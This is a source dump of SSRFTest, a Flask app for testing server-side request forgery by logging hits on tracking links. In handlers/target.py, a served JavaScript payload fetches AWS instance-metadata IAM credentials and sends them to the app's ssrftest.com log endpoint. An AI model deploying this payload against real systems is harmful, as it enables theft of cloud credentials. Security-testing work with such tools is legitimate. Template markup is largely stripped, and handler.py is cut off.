├── handlers
├── __init__.py
├── index.py
├── dashboard.py
├── auth.py
└── target.py
├── prestart.sh
├── run-debug.sh
├── static
└── favicon.png
├── templates
├── index.html
├── dashboard
│ ├── index.html
│ └── newTarget.html
├── auth
│ ├── login.html
│ └── register.html
├── target
│ └── index.html
└── base.html
├── dbrepl.py
├── Dockerfile
├── uwsgi.ini
├── requirements.txt
├── docker-compose.yml
├── readme.md
├── license.txt
├── model.py
├── main.py
├── handler.py
└── metamodel.py
/handlers/__init__.py:
--------------------------------------------------------------------------------
1 | import index, auth, dashboard, target
2 |
--------------------------------------------------------------------------------
/prestart.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | sysctl -w net.core.somaxconn=65536
4 |
--------------------------------------------------------------------------------
/run-debug.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | FLASK_ENV=development python main.py
--------------------------------------------------------------------------------
/static/favicon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/daeken/SSRFTest/HEAD/static/favicon.png
--------------------------------------------------------------------------------
/templates/index.html:
--------------------------------------------------------------------------------
1 | {% extends "base.html" %}
2 | {% block scripts %}
3 | {% endblock %}
4 | {% block body %}
5 |
SSRFTest
6 | Blah blah blah
7 | {% endblock %}
8 |
--------------------------------------------------------------------------------
/dbrepl.py:
--------------------------------------------------------------------------------
#!/usr/local/bin/python -i
# Interactive database shell: `python -i` leaves a prompt open after this
# script runs, with every model imported and a DB session ready to use.
from metamodel import createLocalSession
from main import app
# createLocalSession() stores the session on flask.request, so a request
# context must be active; push a dummy one for '/' and leave it pushed.
app.test_request_context('/').__enter__()
createLocalSession()
from model import *
7 |
--------------------------------------------------------------------------------
/handlers/index.py:
--------------------------------------------------------------------------------
1 | from handler import *
2 |
@handler('index', authed=False)
def get_index():
    """Landing page. Signed-in users are sent straight to their dashboard."""
    currentUser = session.user
    if currentUser is None:
        return dict(page='home')
    # redirect() raises, so the request ends here for signed-in users.
    redirect(handler.dashboard.get_index)
8 |
--------------------------------------------------------------------------------
/Dockerfile:
--------------------------------------------------------------------------------
# Web image for the app. Per its name, the base image bundles nginx + uwsgi
# for Flask on Python 2.7; uwsgi.ini in /app configures the app entry point.
FROM tiangolo/uwsgi-nginx-flask:python2.7

WORKDIR /app

# Copy requirements on their own first, so the pip layer stays cached
# while only application code changes.
ADD requirements.txt /app/

# NOTE(review): --trusted-host tells pip to accept that host even without
# valid HTTPS. Packages are now served from pypi.org /
# files.pythonhosted.org, so this flag is presumably obsolete -- consider
# removing it.
RUN pip install --trusted-host pypi.python.org -r requirements.txt

ADD . /app
10 |
--------------------------------------------------------------------------------
/uwsgi.ini:
--------------------------------------------------------------------------------
[uwsgi]
# Load the WSGI callable `app` from main.py.
module = main
callable = app
# Socket listen backlog. prestart.sh raises net.core.somaxconn so the
# kernel does not cap this lower.
listen = 16384
# Load the application in each worker after fork, not once in the master.
lazy-apps = true
master = true
processes = 100
# Recycle each worker after it has served this many requests.
max-requests = 1000
logto = /var/log/uwsgi.log
# Kill and respawn any worker stuck on a single request for over 45 seconds.
harakiri = 45
11 |
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | bcrypt==3.1.4
2 | certifi==2018.4.16
3 | cffi==1.11.5
4 | chardet==3.0.4
5 | click==6.7
6 | Flask==1.0.2
7 | idna==2.7
8 | itsdangerous==0.24
9 | Jinja2==2.10
10 | MarkupSafe==1.0
11 | pycparser==2.18
12 | six==1.11.0
13 | SQLAlchemy==1.2.10
14 | urllib3==1.23
15 | Werkzeug==0.14.1
16 | psycopg2
17 | flask-cors
18 |
--------------------------------------------------------------------------------
/docker-compose.yml:
--------------------------------------------------------------------------------
version: '3.1'

services:
  db:
    image: postgres
    restart: always
    environment:
      # Must match the password in the connection URL in model.py.
      POSTGRES_PASSWORD: dbpassword
    volumes:
      - db-data:/var/lib/postgresql/data

  web:
    # NOTE(review): presumably privileged so prestart.sh can run
    # `sysctl -w net.core.somaxconn=...`. Privileged mode grants broad host
    # access; confirm a narrower option (e.g. `sysctls:`) is not enough.
    privileged: true
    # Image built from this repo's Dockerfile (see readme).
    image: ssrfweb
    restart: always
    ports:
      - 80:80

volumes:
  db-data:
21 |
--------------------------------------------------------------------------------
/templates/dashboard/index.html:
--------------------------------------------------------------------------------
1 | {% extends "base.html" %}
2 | {% block body %}
3 | New Target
4 | {% if len(targets) %}
5 |
6 |
7 | Name Last Hit
8 |
9 |
10 | {% for (link, name, lastHit) in targets %}
11 | {{ name }} {{ lastHit }}
12 | {% endfor %}
13 |
14 |
15 | {% endif %}
16 | {% endblock %}
--------------------------------------------------------------------------------
/templates/dashboard/newTarget.html:
--------------------------------------------------------------------------------
1 | {% extends "base.html" %}
2 | {% block body %}
3 | {% if error %}
4 | {{ error }}
5 | {% endif %}
6 | New Target
7 |
16 | {% endblock %}
--------------------------------------------------------------------------------
/readme.md:
--------------------------------------------------------------------------------
1 | Welcome to SSRFTest
2 | ===================
3 |
4 | Installation
5 | ------------
6 |
7 | 1. Clone the repo
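8 | 2. Generate a random secret: 32 random bytes written as a 64-character hex string. Use a cryptographically secure source, e.g. run `import os, binascii; print(binascii.hexlify(os.urandom(32)))` in a Python interpreter (the `random` module is not suitable for secrets)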
9 | 3. In main.py, replace the `'SECRET HERE'` placeholder on the `app.secret_key = key = ...` line with that string
10 | 4. (Optional) Change the database password in both docker-compose.yml and model.py; the default is `dbpassword`. The database port is not published outside the Docker network, so this is largely irrelevant
11 | 5. Search for `ssrftest.com` and replace it with the IP/domain you're hosting this on
12 | 6. Install Docker and Docker Compose
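13 | 7. Build the `ssrfweb` image that docker-compose.yml expects: run `./build-docker.sh` (if that script is not present, `docker build -t ssrfweb .` builds an image with that name)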
14 | 8. Run `docker-compose up`
15 | 9. ???
16 | 10. Profit
17 |
--------------------------------------------------------------------------------
/templates/auth/login.html:
--------------------------------------------------------------------------------
1 | {% extends "base.html" %}
2 | {% block body %}
3 | {% if error %}
4 | {{ error }}
5 | {% endif %}
6 |
24 | {% endblock %}
--------------------------------------------------------------------------------
/license.txt:
--------------------------------------------------------------------------------
1 | Copyright 2019 Cody Brocious
2 |
3 | Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
4 |
5 | The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
6 |
7 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
--------------------------------------------------------------------------------
/handlers/dashboard.py:
--------------------------------------------------------------------------------
1 | from handler import *
2 |
# Messages for the new-target form, chosen by its ?error=N query parameter.
errors = [
    'Target name required',                       # 0: blank name
    'You have a target with this name already',   # 1: duplicate name
]

# Alphabet for randomly generated target link identifiers.
linkchars = ('abcdefghijklmnopqrstuvwxyz'
             'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
             '0123456789'
             '_')
9 |
@handler('dashboard/index')
def get_index():
    """List the current user's targets on the dashboard.

    Returns a template context whose ``targets`` entry is a list of
    ``(link, name, lastHit)`` tuples. ``lastHit`` is the latest ``Hit.at``
    for the target, or None if it has never been hit.
    """
    def latestHit(target):
        # max() is a single pass. Sorting every hit only to take the last
        # element gave the same answer in O(n log n).
        times = [hit.at for hit in target.hits]
        return max(times) if times else None

    return dict(page='home', targets=[
        (target.link, target.name, latestHit(target))
        for target in session.user.targets
    ])
16 |
@handler('dashboard/newTarget')
def get_newTarget(error=None):
    """Render the new-target form, optionally showing an error message.

    ``error`` comes from the query string as text and should index into
    ``errors``. Anything that is not a valid index is now ignored. Before,
    ``?error=x`` or ``?error=9`` raised and produced a 500, and negative
    numbers silently picked messages from the end of the list.
    """
    message = None
    if error is not None:
        try:
            position = int(error)
        except (TypeError, ValueError):
            position = -1
        if 0 <= position < len(errors):
            message = errors[position]
    return dict(error=message)
20 |
@handler
def post_newTarget(name):
    """Create a target called ``name`` for the current user, then open it.

    Sends the user back to the form with ``error=0`` for a blank name, or
    ``error=1`` if they already own a target with this name. redirect()
    raises, so each redirect ends the request.
    """
    # Imported explicitly instead of relying on the star-import chain
    # (handler -> model) that happened to expose `random`.
    import random

    if name is None or name.strip() == '':
        redirect(get_newTarget.url(error=0))
    elif Target.one(user_id=session.user.id, name=name):
        redirect(get_newTarget.url(error=1))

    # Anyone who knows a link can record hits and log messages against it
    # through the unauthenticated /x/ and /target/log endpoints. So draw
    # links from the OS CSPRNG instead of the predictable default
    # Mersenne Twister.
    rng = random.SystemRandom()
    while True:
        link = ''.join(rng.choice(linkchars) for _ in range(5))
        if Target.one(link=link) is None:
            break
    Target.add(session.user, link, name)
    redirect(handler.target.get_index.url(link=link))
33 |
--------------------------------------------------------------------------------
/templates/target/index.html:
--------------------------------------------------------------------------------
1 | {% extends "base.html" %}
2 | {% block body %}
3 | {{ name }}
4 | Hit Link:
5 | IFrame:
6 | Script:
7 | Image:
8 | {% if len(logs) %}
9 | Log Messages
10 |
11 |
12 | Date Message
13 |
14 |
15 | {% for (at, message) in logs %}
16 | {{ at }} {{ message }}
17 | {% endfor %}
18 |
19 |
20 | {% endif %}
21 | {% if len(hits) %}
22 | Hits
23 |
24 |
25 | Date Request
26 |
27 |
28 | {% for (at, req) in hits %}
29 | {{ at }} {{ req }}
30 | {% endfor %}
31 |
32 |
33 | {% endif %}
34 | {% endblock %}
35 |
--------------------------------------------------------------------------------
/templates/auth/register.html:
--------------------------------------------------------------------------------
1 | {% extends "base.html" %}
2 | {% block body %}
3 | {% if error %}
4 | {{ error }}
5 | {% endif %}
6 |
36 | {% endblock %}
37 |
--------------------------------------------------------------------------------
/handlers/auth.py:
--------------------------------------------------------------------------------
1 | from handler import *
2 | import bcrypt, random
3 |
# Messages for the login/register pages, chosen by the ?error=N parameter.
errors = [
    'You must be logged in to view that page',   # 0: used by the auth guard
    'Username or email in use',                  # 1
    'Password too short',                        # 2
    'Passwords do not match',                    # 3
    'Invalid username or password',              # 4
]
11 |
@handler('auth/login', authed=False)
def get_index(error=None):
    """Render the login form, or send an already signed-in user home.

    ``error`` comes from the query string and should index into ``errors``.
    Values that are not a valid index are ignored; before, ``?error=x`` or
    ``?error=99`` raised and produced a 500.
    """
    if session.user is not None:
        redirect(handler.index.get_index)
    message = None
    if error is not None:
        try:
            position = int(error)
        except (TypeError, ValueError):
            position = -1
        if 0 <= position < len(errors):
            message = errors[position]
    return dict(page='login', error=message)
17 |
@handler(authed=False)
def get_logout():
    """Sign the current user out and return to the landing page."""
    # pop() instead of del: logging out while not logged in (or twice)
    # used to raise KeyError and produce a 500.
    session.pop('userId', None)
    redirect('/')
22 |
@handler('auth/register', authed=False)
def get_register(error=None):
    """Render the registration form, or send a signed-in user home.

    ``error`` should index into ``errors``; invalid values are ignored
    instead of raising a 500.
    """
    if session.user is not None:
        redirect(handler.index.get_index)
    message = None
    if error is not None:
        try:
            position = int(error)
        except (TypeError, ValueError):
            position = -1
        if 0 <= position < len(errors):
            message = errors[position]
    return dict(page='register', error=message)
28 |
@handler(authed=False)
def post_register(username, password, password2, email):
    """Create an account and sign the new user in.

    Error codes sent back to the form (indices into ``errors``):
    1 = username or email already in use, 2 = password too short,
    3 = passwords do not match. redirect() raises, so each redirect ends
    the request.
    """
    if session.user is not None:
        redirect(handler.index.get_index)
    # Missing form fields arrive as None. Treat them as empty so the length
    # check reports "too short" instead of crashing on len(None).
    password = password or ''
    password2 = password2 or ''
    if User.one(username=username) or User.one(email=email):
        redirect(get_register.url(error=1))
    elif len(password) < 8:
        redirect(get_register.url(error=2))
    elif password != password2:
        redirect(get_register.url(error=3))

    user = User.add(username, password, email, False)
    if user is None:
        # User.add re-checks for an existing enabled user and returns None,
        # e.g. if a concurrent registration took the name first.
        redirect(get_register.url(error=1))
    session['userId'] = user.id
    redirect(handler.index.get_index)
43 |
@handler(authed=False, CSRFable=True)
def post_login(username, password):
    """Check the submitted credentials and start a session for the user.

    Bad credentials send the user back to the login page with error 4.
    redirect() raises, so each redirect ends the request.

    NOTE(review): CSRFable=True exempts this form from the CSRF-token check,
    which allows login CSRF -- confirm this is intentional.
    """
    if session.user is not None:
        redirect(handler.index.get_index)
    found = User.find(username, password)
    if found is None:
        redirect(get_index.url(error=4))
    session['userId'] = found.id
    redirect(handler.index.get_index)
56 |
--------------------------------------------------------------------------------
/handlers/target.py:
--------------------------------------------------------------------------------
1 | from handler import *
2 |
@handler('target/index')
def get_index(link):
    """Show one of the current user's targets with its logs and hits.

    ``logs`` holds ``(at, message)`` tuples and ``hits`` holds
    ``(at, request)`` tuples, each in reverse of the relationship's load
    order. NOTE(review): the relationships set no order_by, so "newest
    first" is only presumed. If ``link`` is missing or not owned by the
    current user, a plain message string is returned instead.
    """
    if link is None:
        return 'Fail'
    owned = Target.one(user_id=session.user.id, link=link)
    if owned is None:
        return 'Unknown link'
    logEntries = [(entry.at, entry.message) for entry in reversed(owned.logs)]
    hitEntries = [(entry.at, entry.request) for entry in reversed(owned.hits)]
    return dict(name=owned.name, logs=logEntries, hits=hitEntries)
15 |
# Payload served for /x/<link>.js. It reports the page it ran in and tries
# to read AWS instance-metadata credentials, sending each finding to
# /target/log. 'LINK' is replaced with the target's link before serving.
# Log data is escaped with encodeURIComponent: encodeURI leaves '&', '#' and
# '+' intact, which truncated or mangled values such as AWS secret keys
# when they were placed into the query string.
js = '''function log(data) {
    var sreq = new XMLHttpRequest();
    sreq.open('GET', 'http://ssrftest.com/target/log?link=LINK&data=' + encodeURIComponent(data), true);
    sreq.send();
}

function get(url) {
    try {
        var req = new XMLHttpRequest();
        req.open('GET', url, false);
        req.send(null);
        if(req.status == 200)
            return req.responseText;
    } catch(err) {
    }
    return null;
}

log('Triggered in ' + window.location.href);
var role = get('http://169.254.169.254/latest/meta-data/iam/security-credentials/');
if(role !== null) {
    log('Fetched AWS role: ' + role);
    log('With AWS credentials: ' + get('http://169.254.169.254/latest/meta-data/iam/security-credentials/' + role));
} else
    log('Failed to get AWS role');
'''
42 |
def hit(link, ext, req):
    """Record a hit on the target identified by ``link`` and return the payload.

    ``req`` is the raw request text to store. If ``ext`` is 'js', the
    response is the payload script with this target's link filled in. Any
    other extension gets a small HTML page that loads that script. If
    ``link`` is missing or unknown, a plain message string is returned.
    """
    if link is None:
        return 'Fail'
    target = Target.one(link=link)
    if target is None:
        return 'Unknown link'
    Hit.add(target, req)

    if ext == 'js':
        return Response(js.replace('LINK', link), mimetype='application/javascript')
    # The HTML body used to be the format string '' % link, which raises
    # TypeError ("not all arguments converted") on every non-.js hit.
    # NOTE(review): this markup is a reconstruction -- confirm it is the
    # intended page. ``link`` is safe to interpolate because it just matched
    # a stored link.
    return Response('<script src="/x/%s.js"></script>' % link, mimetype='text/html')
54 |
@handler(authed=False)
def get_log(link, data):
    """Append ``data`` to the log of the target identified by ``link``.

    No login is required; the injected payload script calls this endpoint.
    Returns '' on success, or a plain message string if ``link`` is missing
    or unknown.
    """
    if link is None:
        return 'Fail'
    found = Target.one(link=link)
    if found:
        Log.add(found, data)
        return ''
    return 'Unknown link'
64 |
--------------------------------------------------------------------------------
/templates/base.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | SSRFTest
6 |
7 |
8 |
9 | {% block scripts %}
10 | {% endblock %}
11 |
12 |
13 |
14 |
15 | SSRFTest
16 |
17 |
18 | Home
19 |
20 | {% if session.user == None %}
21 |
22 | Sign Up
23 |
24 |
25 | Log In
26 |
27 | {% else %}
28 |
29 | Log Out
30 |
31 | {% endif %}
32 |
33 |
34 |
35 |
36 |
37 | {% block body %}
38 | {% endblock %}
39 |
40 |
41 |
42 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
--------------------------------------------------------------------------------
/model.py:
--------------------------------------------------------------------------------
1 | import math, hashlib, json, os, random
2 | from datetime import datetime, timedelta
3 | import sqlalchemy as sa
4 | from sqlalchemy.orm import relationship
5 | from sqlalchemy.types import *
6 | from metamodel import *
7 | import bcrypt
8 |
# Log row: a message recorded for a Target by the /target/log handler.
# @Model (metamodel.py) turns this function's locals into class attributes;
# setup() then maps the column-typed ones to table columns.
@Model
def Log():
    target_id = ForeignKey(Integer, 'Target.id')  # owning Target
    message = Unicode(65536)  # logged text
    at = DateTime  # naive local time from datetime.now() in add()

    @staticmethod
    def add(target, data):
        # Create a Log for `target` holding `data`, stamped with the current
        # time, inside a transact block (commits when outermost).
        # Returns the new row.
        with transact:
            return Log.create(
                target_id=target.id,
                message=data,
                at=datetime.now()
            )
23 |
# Hit row: one raw request received on a target's /x/ link.
# @Model (metamodel.py) turns this function's locals into class attributes;
# setup() then maps the column-typed ones to table columns.
@Model
def Hit():
    target_id = ForeignKey(Integer, 'Target.id')  # owning Target
    request = Unicode(65536)  # raw request text built by main.hit
    at = DateTime  # naive local time from datetime.now() in add()

    @staticmethod
    def add(target, request):
        # Create a Hit for `target` with the raw `request` text, stamped with
        # the current time, inside a transact block (commits when outermost).
        # Returns the new row.
        with transact:
            return Hit.create(
                target_id=target.id,
                request=request,
                at=datetime.now()
            )
38 |
# Target row: a named tracking link owned by a user.
# @Model (metamodel.py) turns this function's locals into class attributes;
# setup() maps column-typed locals to columns and relations to mappings.
@Model
def Target():
    user_id = ForeignKey(Integer, 'User.id')  # owner
    enabled = Boolean  # add() sets True; not checked anywhere visible here
    link = String(5)  # random 5-character id used in /x/ and log URLs
    name = Unicode  # user-chosen display name

    logs = Log.relation(backref='target')  # Log rows; also gives Log.target
    hits = Hit.relation(backref='target')  # Hit rows; also gives Hit.target

    @staticmethod
    def add(user, link, name):
        # Create an enabled Target for `user` with the given link and name,
        # inside a transact block (commits when outermost).
        # Returns the new row.
        with transact:
            return Target.create(
                enabled=True,
                user_id=user.id,
                link=link,
                name=name
            )
58 |
# User account. @Model (metamodel.py) turns this function's locals into
# class attributes; setup() maps the column-typed ones to table columns.
# (Only nested functions below introduce extra locals, so no new columns.)
@Model
def User():
    enabled = Boolean  # find()/add() only consider enabled users
    admin = Boolean
    username = Unicode(255)
    password = String(88)  # bcrypt hash produced by User.hash()
    email = String
    registrationDate = DateTime

    targets = Target.relation(backref='user')

    def setPassword(self, password):
        """Replace this user's stored hash with one for ``password``."""
        with transact:
            self.password = User.hash(password)

    @staticmethod
    def hash(password):
        """Return a bcrypt hash (work factor 12) of ``password``."""
        return bcrypt.hashpw(password.encode('utf-8'), bcrypt.gensalt(12))

    @staticmethod
    def checkHash(hash, password):
        """Return True if ``password`` matches the stored bcrypt ``hash``.

        Uses bcrypt.checkpw, which compares in constant time. The old
        ``hashpw(...) == hash`` used an ordinary early-exit string
        comparison. Any error (None or malformed hash, bad input type)
        counts as a mismatch.
        """
        try:
            return bcrypt.checkpw(password.encode('utf-8'), hash.encode('utf-8'))
        except Exception:
            return False

    @staticmethod
    def add(username, password, email, admin):
        """Create and return a new enabled user.

        Returns None if an enabled user already has this username or email.
        """
        if User.one(enabled=True, username=username) or User.one(enabled=True, email=email):
            return None
        with transact:
            return User.create(
                enabled=True,
                username=username,
                password=User.hash(password),
                email=email,
                admin=admin,
                registrationDate=datetime.now()
            )

    @staticmethod
    def find(username, password):
        """Return the enabled user matching these credentials, or None.

        Bootstrap rule: if no user with that name exists and the user table
        is completely empty, the credentials are registered as the first
        (admin) account, and that user is returned.
        """
        if username is None or password is None:
            return None
        user = User.one(enabled=True, username=username)
        if user and User.checkHash(user.password, password):
            return user
        if not user:
            everyone = User.all()
            # all() yields None when its query keeps failing. Never read that
            # as "no users yet", or a DB hiccup could create an admin.
            # (The old len(None) raised TypeError instead.)
            if everyone is not None and len(everyone) == 0:
                return User.add(username, password, 'admin@admin', True)
        return None
110 |
# SQLAlchemy URL for the Postgres service `db` from docker-compose.yml.
# DATABASE_URL can override it, so the password need not be edited in
# source. The default matches the compose file's POSTGRES_PASSWORD.
db = os.environ.get('DATABASE_URL', 'postgresql://postgres:dbpassword@db/postgres')
112 |
@setup(db)
def init():
    """First-run hook: setup() calls this only if none of the model tables
    existed beforehand. There is currently no seed data to create."""
116 |
--------------------------------------------------------------------------------
/main.py:
--------------------------------------------------------------------------------
1 | import os
2 | from flask import Flask, request
3 | from flask_cors import CORS
4 | from werkzeug.routing import Rule
5 | import handler
6 | import handlers
7 | from handlers import *
8 | from metamodel import createLocalSession, closeLocalSession
9 |
app = Flask(__name__)
CORS(app, resources={r'/x/*': {'origins' : '*'}, r'/target/log': {'origins' : '*'}})
# Debug mode used to be forced on here, which also left it on in the uwsgi
# deployment. Flask 1.0 already derives DEBUG from FLASK_DEBUG / FLASK_ENV
# (run-debug.sh sets FLASK_ENV=development), so leave it to the environment.
# The session-signing key can come from the SECRET_KEY environment
# variable. Otherwise the in-source placeholder is used; replace it per
# the readme.
app.secret_key = key = os.environ.get('SECRET_KEY') or 'SECRET HERE'
app.config.update(
    SESSION_COOKIE_NAME='__Host-session',
    # With Secure and the __Host- prefix, browsers only send this cookie
    # over HTTPS. NOTE(review): docker-compose.yml publishes only port 80;
    # presumably TLS terminates in front of it -- confirm.
    SESSION_COOKIE_SECURE=True,
    SESSION_COOKIE_HTTPONLY=True,
    SESSION_COOKIE_SAMESITE='Lax'
)
20 |
@app.teardown_request
def session_clear(exception=None):
    """Dispose of the request's DB session, if one was created.

    On error, the transaction is rolled back *before* remove(). After
    remove(), touching ``request._session`` makes the scoped registry create
    a brand-new session, so the old order rolled back an empty session
    instead of the failed one.
    """
    scoped = getattr(request, '_session', None)
    if scoped is None:
        return
    try:
        if exception is not None and scoped.is_active:
            scoped.rollback()
    finally:
        scoped.remove()
28 |
def reroute(noId, withId):
    """Combine a handler's plain view and its ``<id>`` view into one.

    The returned view calls ``withId(id, ...)`` when an ``id`` is supplied
    and ``noId(...)`` otherwise. Errors are printed and then re-raised. They
    used to be swallowed, so the view returned None (an invalid Flask
    response) and e.g. abort(403)/abort(404) surfaced as a 500.
    """
    def sub(id=None, *args, **kwargs):
        try:
            if id is None:
                return noId(*args, **kwargs)
            return withId(id, *args, **kwargs)
        except Exception:
            import traceback
            traceback.print_exc()
            raise
    # Flask derives the endpoint name from __name__ (same as func_name on py2).
    sub.__name__ = '__reroute_' + noId.__name__
    return sub
41 |
def _registerHandlerRoutes():
    """Register every handler in ``handler.all`` as a Flask route.

    Paths follow the handler URL scheme: '/' for index/index,
    '/<module>' for a module's 'index' handler, and '/<module>/<name>'
    otherwise. Handlers whose first argument is ``id`` also get
    '<path>/<id>'. When a plain view and an id view share a name, both
    paths dispatch through reroute().
    """
    for module, routes in handler.all.items():
        for name, (method, _args, _rpc, (noId, withId)) in routes.items():
            if module == 'index':
                route = '/'
                trailing = True
            else:
                route = '/%s' % module
                trailing = False
            if name != 'index':
                if not trailing:
                    route += '/'
                route += name
                trailing = False

            if noId is not None and withId is not None:
                view = reroute(noId, withId)
            elif noId is not None:
                view = noId
            else:
                view = withId

            if withId is not None:
                # Append the <id> URL variable. The old code appended '', so
                # the id route had no variable for Flask to pass to the view.
                idRoute = route if trailing else route + '/'
                app.route(idRoute + '<id>', methods=[method])(view)

            if noId is not None:
                app.route(route, methods=[method])(view)

_registerHandlerRoutes()
72 |
@app.route('/favicon.ico')
def favicon():
    """Serve static/favicon.png for the browser's default favicon request."""
    return app.send_static_file('favicon.png')

# The URL variables are restored here. These routes had no <fn>/<dir>
# placeholders, so Flask called staticfiles() without its required
# argument.
@app.route('/css/<fn>')
@app.route('/fonts/<fn>')
@app.route('/img/<fn>')
@app.route('/js/<fn>')
@app.route('/js/<dir>/<fn>')
def staticfiles(fn, dir=None):
    """Serve /css, /fonts, /img and /js assets from the static folder.

    The request path, minus its leading '/', is used as the path inside the
    static folder (e.g. /js/lib/x.js -> js/lib/x.js). Any segment
    containing '..' is refused.
    """
    if '..' in fn or (dir is not None and '..' in dir):
        return 'There is only one god and his name is Directory Traversal. And there is only one thing we say to Directory Traversal: "Not today."'
    return app.send_static_file(request.path[1:])
85 |
# JavaScript stub that /rpc.js emits for each rpc_ handler. The placeholders
# are: method name, parameter list (the handler's arguments followed by
# `callback`), JSON-encoded URL, and POST data entries (`csrf: $csrf` first).
rpcStubTemplate = '''%s: function(%s) {
    $.ajax(%s,
        {
            success: function(data) {
                if(callback !== undefined)
                    callback(data)
            },
            error: function() {
                if(callback !== undefined)
                    callback()
            },
            dataType: 'json',
            data: {%s},
            type: 'POST'
        }
    )
}'''
cachedRpc = None
@app.route('/rpc.js')
def rpc():
    """Serve ``var $rpc = {module: {method: function(args..., callback)}}``.

    There is one stub per rpc_ handler. Each stub POSTs its arguments plus
    the page's ``$csrf`` token via jQuery, then passes the parsed JSON
    (or nothing, on error) to ``callback``. The script is built once and
    cached.

    The parameter list is built as a list: the old template hard-coded
    "%s, callback", which produced the JS syntax error
    ``function(, callback)`` for handlers with no arguments. The response
    is now labelled application/javascript.
    """
    global cachedRpc
    import json
    from flask import Response

    if not cachedRpc:
        modules = []
        for module, routes in handler.all.items():
            stubs = []
            for name, (method, args, isRpc, funcs) in routes.items():
                if not isRpc:
                    continue
                view = funcs[0] if funcs[0] else funcs[1]
                params = list(args) + ['callback']
                data = ['csrf: $csrf'] + ['%s: %s' % (arg, arg) for arg in args]
                stubs.append(rpcStubTemplate % (
                    name[4:],  # strip the 'rpc_' prefix
                    ', '.join(params),
                    json.dumps(view.url()),
                    ', '.join(data),
                ))
            if stubs:
                modules.append('%s: {%s}' % (module, ', '.join(stubs)))
        cachedRpc = 'var $rpc = {%s};' % ', '.join(modules)
    return Response(cachedRpc, mimetype='application/javascript')
129 |
# The <fn> URL variable is restored. The route was '/scripts/', so Flask
# could never supply script()'s argument.
@app.route('/scripts/<fn>')
def script(fn):
    """Serve ``scripts/<fn>`` (relative to the working directory) as JavaScript.

    Only names ending in '.js' are served. A name that does not end in
    '.js', contains '..', or refers to a missing file yields an empty body.
    """
    from flask import Response

    if not fn.endswith('.js') or '..' in fn:
        return ''
    path = os.path.join('scripts', fn)
    if not os.path.exists(path):
        return ''
    # `with` closes the handle; the old file(...).read() leaked it until GC.
    with open(path, 'rb') as fp:
        return Response(fp.read(), mimetype='application/javascript')
143 |
# The <link> URL variable is restored. The rule read '/x/ ' with no
# variable, so Flask could never supply hit()'s ``link`` argument.
app.url_map.add(Rule('/x/<link>', endpoint='hit'))

@app.endpoint('hit')
def hit(link):
    """Store a raw dump of the incoming request as a Hit on ``link``.

    ``link`` may carry an extension (``abcde.js``). The part after the first
    '.' is passed to handlers.target.hit as ``ext``, which picks the
    payload served.
    """
    link, _, ext = link.partition('.')

    protocol = request.environ.get('SERVER_PROTOCOL', 'HTTP/1.1')
    lines = ['%s %s %s' % (request.method, request.url, protocol)]
    lines.extend('%s: %s' % (k, v) for k, v in request.headers)
    # Decode the body explicitly. Appending raw body bytes to the (unicode)
    # request line raised UnicodeDecodeError for non-ASCII bodies, and
    # fails outright on Python 3.
    body = request.get_data().decode('utf-8', 'replace')
    req = '\r\n'.join(lines) + '\r\n\r\n' + body

    createLocalSession()
    failed = True
    try:
        ret = handlers.target.hit(link, ext, req)
        failed = False
    finally:
        closeLocalSession(failed)
    return ret
168 |
if __name__=='__main__':
    # Development entry point (run-debug.sh runs `python main.py`).
    # Production goes through uwsgi (uwsgi.ini: module = main, callable = app).
    # NOTE(review): host='' presumably binds every interface. With debug
    # mode on, that exposes the Werkzeug debugger to the network -- confirm.
    app.run(host='')
171 |
--------------------------------------------------------------------------------
/handler.py:
--------------------------------------------------------------------------------
1 | import os
2 | from json import dumps
3 | from flask import abort, make_response, render_template, request, session, Response
4 | from flask import redirect as _redirect
5 | from werkzeug.exceptions import HTTPException
6 | from urllib import quote, urlencode
7 | from datetime import datetime, timedelta
8 | from metamodel import createLocalSession, closeLocalSession
9 | from model import *
10 |
class DictObject(dict):
    """A dict that also accepts attribute assignment.

    Used for the per-module handler registries, so handlers can be reached
    as attributes (e.g. ``handler.auth.get_index``).
    """


class StrObject(str):
    """A str that can carry extra attributes (used for handler URL objects)."""


# Handler registry: module name -> DictObject of route name -> route info.
all = {}
18 |
def handler(_tpl=None, _json=False, CSRFable=False, authed=True, admin=False):
    """Turn a ``get_``/``post_``/``rpc_`` function into a routed view.

    Usable bare (``@handler``) or with options
    (``@handler('tpl/name', authed=False)``):

    * ``_tpl``     -- template rendered as ``<tpl>.html`` with the dict the
                      function returns (ignored for rpc_ handlers).
    * ``_json``    -- serialise the return value as JSON (always on for rpc_).
    * ``CSRFable`` -- skip the CSRF-token check on POST.
    * ``authed``   -- require ``session.user``; otherwise redirect to login.
    * ``admin``    -- require an admin user; otherwise 404.

    The function's arguments are filled from the form (POST) or the query
    string (GET), or else from uploaded files. For non-rpc handlers, a
    leading ``id`` argument comes from the URL instead.

    The view is stored in the ``all`` registry as
    ``all[module][name] = (method, args, rpc, [view, idView])``. The
    decorator returns a ``StrObject``: the handler's URL as a string, with a
    ``.url(_id=None, **query)`` builder attached.
    """
    import binascii

    def sub(func):
        ofunc = func
        # Follow __delegated__ links so name/argument introspection sees the
        # innermost wrapped function.
        while hasattr(func, '__delegated__'):
            func = func.__delegated__
        sofunc = func

        name = func.__name__
        rpc = False
        stpl = _tpl
